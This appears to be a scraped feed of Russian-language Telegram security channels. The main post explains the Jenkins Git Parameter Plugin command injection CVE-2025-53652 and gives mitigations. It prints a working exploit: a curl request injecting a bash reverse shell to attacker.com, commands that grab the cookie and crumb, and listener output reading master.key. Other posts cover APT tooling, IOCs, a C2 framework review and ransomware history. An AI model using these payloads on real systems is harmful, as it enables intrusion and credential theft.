Forwarded from Похек
CVE-2025-53652: Jenkins под ударом через Git Parameter
#jenkins #devops #dev #git
Command injection в популярном Jenkins Git Parameter Plugin ставит под угрозу DevOps инфраструктуру тысяч организаций. Несмотря на официальную оценку "Medium", исследователи VulnCheck доказали возможность удаленного выполнения кода и компрометации CI/CD пайплайнов.
🪲 Суть уязвимости
Git Parameter Plugin не валидирует параметры, передаваемые в build-процессы. Плагин принимает произвольные значения вместо проверки соответствия предложенным вариантам, что позволяет инъекцию команд через Git-параметры.
Затронутые версии: 439.vb_0e46ca_14534 и ранее
Исправлено в: 444.vca_b_84d3703c2
#️⃣ Техническая механика атаки
➡️ Цепочка эксплуатации
Плагин встраивает пользовательский ввод напрямую в shell-команды без валидации. Git как GTFObin предоставляет множество способов выполнения команд, делая cmd injection особенно опасной.
➡️ Практический эксплойт
❗️ Масштаб проблемы
VulnCheck провел анализ интернет-экспозиции Jenkins:
15,000 Jenkins-серверов полностью доступны без аутентификации, что делает RCE возможным "из коробки".
ℹ️ Требования для эксплуатации
➡️ Аутентифицированные атаки
- Права Item/Build на целевом проекте
- Знание имени build-задачи
- Валидная сессия и CSRF-токен
➡️ Неаутентифицированные атаки
Даже на серверах без аутентификации требуется:
- Валидный session cookie
- Jenkins-Crumb (CSRF токен)
- Имя build-задачи
❗️ Реальное воздействие
➡️ В случае успешного похека
➡️ Потенциальные последствия
- Доступ к master.key — полная компрометация Jenkins
- Исходный код проектов — утечка интеллектуальной собственности
- Секреты CI/CD — credentials, API ключи, сертификаты
- Supply chain атаки — внедрение backdoor в артефакты
- Lateral movement — распространение по инфраструктуре
❗️ Митигация и защита
➡️ Немедленные действия
1. Обновление плагина до версии 444.vca_b_84d3703c2+
2. Проверка bypass-флага — убедиться, что не установлен:
3. Аудит конфигурации — отключить ненужные плагины
➡️ Долгосрочная стратегия
- Принцип наименьших привилегий для build permissions
- Сетевая сегментация Jenkins от критических систем
- Мониторинг активности через SIEM/SOC
- Регулярные security assessments CI/CD инфраструктуры
Источники:
🔗 VulnCheck Analysis
🔗 Jenkins Security Advisory
🔗 CVE-2025-53652 NVD
🌚 @poxek | MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK | ❤️ Мерч
#jenkins #devops #dev #git
Command injection в популярном Jenkins Git Parameter Plugin ставит под угрозу DevOps инфраструктуру тысяч организаций. Несмотря на официальную оценку "Medium", исследователи VulnCheck доказали возможность удаленного выполнения кода и компрометации CI/CD пайплайнов.
Git Parameter Plugin не валидирует параметры, передаваемые в build-процессы. Плагин принимает произвольные значения вместо проверки соответствия предложенным вариантам, что позволяет инъекцию команд через Git-параметры.
Затронутые версии: 439.vb_0e46ca_14534 и ранее
Исправлено в: 444.vca_b_84d3703c2
# Нормальный параметр
BRANCH_PARAM = "master"
# Выполняется: git rev-parse --resolve-git-dir /path/master/.git
# Вредоносный параметр
BRANCH_PARAM = "$(sleep 80)"
# Выполняется: git rev-parse --resolve-git-dir /path/$(sleep 80)/.git
# Результат: команда sleep выполняется как дочерний процесс
Плагин встраивает пользовательский ввод напрямую в shell-команды без валидации. Git как GTFObin предоставляет множество способов выполнения команд, делая cmd injection особенно опасной.
# Reverse shell через curl
curl -kv 'http://jenkins:8080/job/buildName/build' -X POST \
-H 'Cookie: [cookie]' \
--data-urlencode 'Jenkins-Crumb=[crumb]' \
--data-urlencode 'json={"parameter":{"name":"BRANCH_PARAM","value":"$(bash -c \"bash &> /dev/tcp/attacker.com/12700 <&1\")"}}'
VulnCheck провел анализ интернет-экспозиции Jenkins:
| Категория | Количество серверов | Риск|
|------------------------|---------------------|-------------|
| Требуют аутентификации | 100,000+ | Средний |
| Открытая регистрация | ~1,000 | Высокий |
| Без аутентификации | ~15,000 | Критический |
15,000 Jenkins-серверов полностью доступны без аутентификации, что делает RCE возможным "из коробки".
- Права Item/Build на целевом проекте
- Знание имени build-задачи
- Валидная сессия и CSRF-токен
Даже на серверах без аутентификации требуется:
- Валидный session cookie
- Jenkins-Crumb (CSRF токен)
- Имя build-задачи
# Получение необходимых данных
curl -kv http://target:8080/ -o /dev/null # Получить cookie
curl -kv http://target:8080/job/buildName/build -H 'Cookie: [cookie]' | grep "data-crumb-value="
# Результат эксплуатации
$ nc -lvnp 1270
Connection received on 172.18.0.3 55664
$ id
uid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins)
$ cat ~/secrets/master.key
05322ff531f1b52117bf013b2fe77b40dacbc56268d68b9e234216fe825a0073a5c8051181033f630e67c408d58c3ef631e18ba8b8e6722e64d3c1380518e89a91b4256c5c348febceb24ef32f144045ed422dfb4bdc840aca33814989e431aa00db6df7c403da38247324783811d46c6f3caa1f9b1b26d979fff4391249ca8a
- Доступ к master.key — полная компрометация Jenkins
- Исходный код проектов — утечка интеллектуальной собственности
- Секреты CI/CD — credentials, API ключи, сертификаты
- Supply chain атаки — внедрение backdoor в артефакты
- Lateral movement — распространение по инфраструктуре
1. Обновление плагина до версии 444.vca_b_84d3703c2+
2. Проверка bypass-флага — убедиться, что не установлен:
-Dnet.uaznia.lukanus.hudson.plugins.gitparameter.GitParameterDefinition.allowAnyParameterValue=true
3. Аудит конфигурации — отключить ненужные плагины
- Принцип наименьших привилегий для build permissions
- Сетевая сегментация Jenkins от критических систем
- Мониторинг активности через SIEM/SOC
- Регулярные security assessments CI/CD инфраструктуры
Источники:
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Threat Hunting Father 🦔
Unit 42 обнаружили новый китайский nexus-APT, обозначенный Phantom Taurus.
Быстрая картина атак (high-level flow)
• Первичное проникновение — web-shell / уязвимый IIS endpoint (часто OutlookEN.aspx как загрузчик).
• Загрузка в память IIServerCore (fileless) → поддержка динамической загрузки .NET-ассемблей (AssemblyExecuter).
• Пост-эксплуатация — поиск нужной информации: сначала email-theft, в 2025 — сдвиг в сторону целевых SQL-дампов через
mssq.bat и WMI-исполнение.• Экфильтрация — зашифрованные C2 (AES), память-только payloads, timestomp / изменение дат для сокрытия следов.
🛠️ Основной тулкит (подборка)
• NET-STAR suite: IIServerCore, AssemblyExecuter v1, AssemblyExecuter v2 (v2 — AMSI & ETW bypass).
• Вспомогательные/известные инструменты в наборе TTP: China Chopper, JuicyPotato/SharpEfsPotato, Impacket, Mimikatz, TunnelSpecter, SweetSpecter и др. (см. Appendix A в отчёте).
Что делает NET-STAR (технически)
• IIServerCore — модульный fileless backdoor: загружается через ASPX web-shell (OutlookEN.aspx), держится в
w3wp.exe, принимает команды, загружает .NET-assemblies из Base64, выполняет в памяти, шифрует ответ AES, поддерживает timestomp/changeLastModified.• AssemblyExecuter v1 — in-memory загрузка и исполнение .NET-assemblies (минимальная «шумность» для AV).
AssemblyExecuter v2 — как v1 + методы обхода AMSI/ETW; применение обходов динамически по параметрам.
• Наличие ASPX-файлов с встроенным Base64-блоком (особенно OutlookEN.aspx или похожие имена).
•
w3wp.exe с нетипичной динамической загрузкой .NET-ассемблей (Assembly.Load / Reflection / Invoke), особенно если командный поток содержит STAR-delimited Base64.• Необычные модификации timestamps (файлы с будущими датами, timestomp).
• Команды на исполнение SQL через WMI (запуски
mssq.bat, sqlcmd под контекстом удалённого выполнения).
• Фокус — memory only поведения: инструменты типа Sysmon + ETW/Process-Create/ModuleLoad + EDR memory-callbacks помогут увидеть Assembly.Load и динамическое Reflection.
• Коррелируйте ASPX-загрузки с сетевыми запросами к ненормальным C2 и с последующими WMI-вызовами (вспышка
wmic process call create / win32_process выполняющие mssq.bat). Проактивно просканируйте webroot на ASPX с Base64 и сравните SHA/текстовые отпечатки с known-IOCs.
IOCs (средне/высокая степень уверенности)
SHA256:
1. IIServerCore (ServerCore.dll):
eeed5530fa1cdeb69398dc058aaa01160eab15d4dcdcd6cb841240987db284dc.2. AssemblyExecuter V1 (ExecuteAssembly.dll):
3e55bf8ecaeec65871e6fca4cb2d4ff2586f83a20c12977858348492d2d0dec4.3. AssemblyExecuter V2 (ExecuteAssembly.dll):
afcb6289a4ef48bf23bab16c0266f765fab8353d5e1b673bd6e39b315f83676e and b76e243cf1886bd0e2357cbc7e1d2812c2c0ecc5068e61d681e0d5cff5b8e038.(Добавьте эти SHA в EDR/AV/IOC-feeds; ищите совпадения в внутренней телеметрии.)
Быстрая тактика реагирования (playbook bullets)
• Изолируйте и снимите дамп
w3wp.exe при подозрении на in-memory .NET-загрузку.Соберите веб-корень (ASPX) и сделайте хеши/стринг-анализ (ищем Base64, STAR-delimiter).
• Проверьте WMI-журналы на remote WMI execution и поиск
mssq.bat/sql-вызовов.• Проанализируйте сетевой трафик на AES-зашифрованные POST/GET с нестандартными параметрами и STAR-делимитером.
• Удалите/ресторите компрометированные web-файлы, обновите веб-серверы, примените правила Web Application Firewall для блокировки подозрительных ASPX загрузок.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Хабр
В сети появился китайский ИИ-инструмент для пентестинга
В сети начали распространять новый инструмент для пентестинга под названием Villager, связанный с подозрительной китайской компанией и описанный исследователями как «преемник Cobalt Strike на базе...
🔗Ссылка:
https://habr.com/ru/news/946562/
https://habr.com/ru/news/946562/
Forwarded from Похек
Adaptix C2 и Cobalt Strike: сравнительный аналитический обзор для специалистов по кибербезопасности
#adaptix #cobalt #C2 #redteam #IoC
Я учёл последнии комментарии, что контент на канале скатился, поэтому давайте вместе make Poxek great again)
➡️ Введение
В современной экосистеме инструментов пост-эксплуатации наблюдается устойчивый тренд: сдвиг от закрытых коммерческих решений к гибким open-source C2-фреймворкам. Если в 2010-х годах доминировали продукты уровня Cobalt Strike и Metasploit Pro, то в середине 2020-х активно появляются проекты нового поколения — такие как Adaptix C2.
➡️ Обзор Adaptix C2
▪️ Архитектура
Серверная часть: написана на Go, что обеспечивает кроссплатформенность, простоту деплоя и высокую производительность.
- Клиентская часть: Qt/C++ приложение, работающее на Windows, Linux и macOS. Это делает управление C2 доступным с разных ОС, в отличие от ряда конкурентов.
- Модульность: поддержка кастомных агентов и расширений. Ориентация на расширяемость позволяет создавать собственные плагины, команды и интеграции.
▪️ Особенности
Open-source модель — прозрачный код облегчает аудит и кастомизацию, но открывает злоумышленникам доступ к функционалу.
- Активное сообщество — развивается быстрее, чем многие закрытые проекты.
- Применимость — используется как в легитимных Red Team-операциях, так и уже фиксируется в реальных инцидентах.
🔗 blog.poxek
🌚 @poxek | MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK | ❤️ Мерч
#adaptix #cobalt #C2 #redteam #IoC
Я учёл последнии комментарии, что контент на канале скатился, поэтому давайте вместе make Poxek great again)
В современной экосистеме инструментов пост-эксплуатации наблюдается устойчивый тренд: сдвиг от закрытых коммерческих решений к гибким open-source C2-фреймворкам. Если в 2010-х годах доминировали продукты уровня Cobalt Strike и Metasploit Pro, то в середине 2020-х активно появляются проекты нового поколения — такие как Adaptix C2.
Серверная часть: написана на Go, что обеспечивает кроссплатформенность, простоту деплоя и высокую производительность.
- Клиентская часть: Qt/C++ приложение, работающее на Windows, Linux и macOS. Это делает управление C2 доступным с разных ОС, в отличие от ряда конкурентов.
- Модульность: поддержка кастомных агентов и расширений. Ориентация на расширяемость позволяет создавать собственные плагины, команды и интеграции.
Open-source модель — прозрачный код облегчает аудит и кастомизацию, но открывает злоумышленникам доступ к функционалу.
- Активное сообщество — развивается быстрее, чем многие закрытые проекты.
- Применимость — используется как в легитимных Red Team-операциях, так и уже фиксируется в реальных инцидентах.
Please open Telegram to view this post
VIEW IN TELEGRAM
www.opennet.ru
Взлом внутреннего GitLab-сервера Red Hat
Хакерская группа Crimson Collective заявила о получении доступа к одному из внутренних GitLab-серверов компании Red Hat и загрузке с него 570ГБ сжатых данных, содержащих информацию из 28 тысяч репозиториев. Среди прочего в захваченных данных присутствовало…
🔗Ссылка:
https://opennet.ru/63986/
https://opennet.ru/63986/
www.opennet.ru
Уязвимость в Red Hat OpenShift AI, допускающая root-доступ к узлам кластера
В платформе OpenShift AI Service, позволяющей организовать работу кластера для выполнения и обучения AI-моделей, выявлена уязвимость (CVE-2025-10725), позволяющая непривилегированному пользователю получить права администратора кластера. После успешной атаки…
🔗Ссылка:
https://opennet.ru/63991/
https://opennet.ru/63991/
www.opennet.ru
Выпуск Raspberry Pi OS, переведённый на пакетную базу Debian 13
Разработчики проекта Raspberry Pi представили новую версию дистрибутива Raspberry Pi OS 2025-10-01 (Raspbian), основанного на пакетной базе Debian 13. В репозитории доступно около 35 тысяч пакетов. Среда рабочего стола базируется на композитном сервере labwc…
🔗Ссылка:
https://opennet.ru/63995/
https://opennet.ru/63995/
Forwarded from Похек
This media is not supported in your browser
VIEW IN TELEGRAM
BlackMatter Ransomware: подробный анализ и рекомендации
#APT #DarkSide #REvil #BlackMatter #Ransom #RaaS
➡️ Происхождение и эволюция
BlackMatter — это прямой наследник DarkSide и REvil. После громких атак (Colonial Pipeline, Kaseya, JBS) эти банды исчезли с публичного поля, и уже в июле 2021 появилось «новое» имя — BlackMatter. Это типичный ребрендинг: кодовая база, инфраструктура и даже «фирменные ошибки» в криптоалгоритмах указывают на преемственность.
Вывод: BlackMatter = ребрендинг DarkSide с новым PR, но той же кодовой базой.
➡️ Архитектура и модель работы
- Ransomware-as-a-Service (RaaS): операторы создают ядро, «партнёры» проводят атаки.
- Структура экосистемы:
- Разработчики (ядро, криптология).
- Партнёры (phishing, эксплойты, lateral movement).
- Платформа переговоров (Tor-чаты).
- Сайт «утечек» данных.
Интересно: BlackMatter активно вербовал на форумах XSS и Exploit, обещая «надежность и поддержку 24/7».
В отличие от многих кибератак, которые для создания плацдарма используют фишинг, BlackMatter, судя по всему, получает первоначальный доступ в первую очередь посредством взлома уязвимых периферийных устройств и злоупотребления корпоративными учетными данными, полученными из других источников.
Хотя в некоторых исключительных случаях возможно использование фишинговых кампаний и вредоносных документов, приводящих к сбрасыванию или загрузке компактной полезной нагрузки BlackMatter размером около 80 КБ, в ходе проведенных нами расследований таких случаев не наблюдалось.
Помимо членов BlackMatter, эксплуатирующих уязвимости инфраструктуры, например, те, что присутствуют в устройствах или серверах удаленного рабочего стола, виртуализации и VPN, операторы первоначального доступа, связанные с группой, вероятно, внесут свои собственные TTP и могут отдавать предпочтение эксплуатации одних уязвимостей перед другими.
🔗 blog.poxek
🌚 @poxek | MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK | ❤️ Мерч
#APT #DarkSide #REvil #BlackMatter #Ransom #RaaS
BlackMatter — это прямой наследник DarkSide и REvil. После громких атак (Colonial Pipeline, Kaseya, JBS) эти банды исчезли с публичного поля, и уже в июле 2021 появилось «новое» имя — BlackMatter. Это типичный ребрендинг: кодовая база, инфраструктура и даже «фирменные ошибки» в криптоалгоритмах указывают на преемственность.
Вывод: BlackMatter = ребрендинг DarkSide с новым PR, но той же кодовой базой.
- Ransomware-as-a-Service (RaaS): операторы создают ядро, «партнёры» проводят атаки.
- Структура экосистемы:
- Разработчики (ядро, криптология).
- Партнёры (phishing, эксплойты, lateral movement).
- Платформа переговоров (Tor-чаты).
- Сайт «утечек» данных.
Интересно: BlackMatter активно вербовал на форумах XSS и Exploit, обещая «надежность и поддержку 24/7».
В отличие от многих кибератак, которые для создания плацдарма используют фишинг, BlackMatter, судя по всему, получает первоначальный доступ в первую очередь посредством взлома уязвимых периферийных устройств и злоупотребления корпоративными учетными данными, полученными из других источников.
Хотя в некоторых исключительных случаях возможно использование фишинговых кампаний и вредоносных документов, приводящих к сбрасыванию или загрузке компактной полезной нагрузки BlackMatter размером около 80 КБ, в ходе проведенных нами расследований таких случаев не наблюдалось.
Помимо членов BlackMatter, эксплуатирующих уязвимости инфраструктуры, например, те, что присутствуют в устройствах или серверах удаленного рабочего стола, виртуализации и VPN, операторы первоначального доступа, связанные с группой, вероятно, внесут свои собственные TTP и могут отдавать предпочтение эксплуатации одних уязвимостей перед другими.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from REDtalk (Mister Fox)
Всем привет!👋
Подъехала вторая часть статьи про пентест Wi-Fi. На этот раз решили выпустить статью в notion, так как для телеграмм-поста буков оказалось многовато.
Ссылка вот тут: 🔗
Приятного чтения!
Подъехала вторая часть статьи про пентест Wi-Fi. На этот раз решили выпустить статью в notion, так как для телеграмм-поста буков оказалось многовато.
Ссылка вот тут: 🔗
Приятного чтения!
Please open Telegram to view this post
VIEW IN TELEGRAM
Notion
Notion | Where teams and agents work together
A collaborative AI workspace, built on your company context. Build and orchestrate agents right alongside your team's projects, meetings, and connected apps.